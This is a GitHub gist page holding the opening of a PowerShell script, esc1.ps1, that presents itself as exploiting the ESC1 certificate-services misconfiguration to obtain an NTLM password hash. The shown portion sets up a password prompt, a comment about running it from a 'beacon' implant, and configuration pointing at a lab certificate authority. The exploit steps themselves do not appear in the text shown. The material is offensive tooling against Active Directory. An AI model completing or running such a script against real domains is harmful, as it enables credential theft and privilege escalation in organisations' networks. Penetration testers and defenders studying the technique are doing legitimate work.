Skip to content

Instantly share code, notes, and snippets.

View Yeeb1's full-sized avatar
๐Ÿ’€
:feelsgood:

Yeeb Yeeb1

๐Ÿ’€
:feelsgood:
View GitHub Profile
@Yeeb1
Yeeb1 / esc1.ps1
Created September 11, 2024 19:50 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER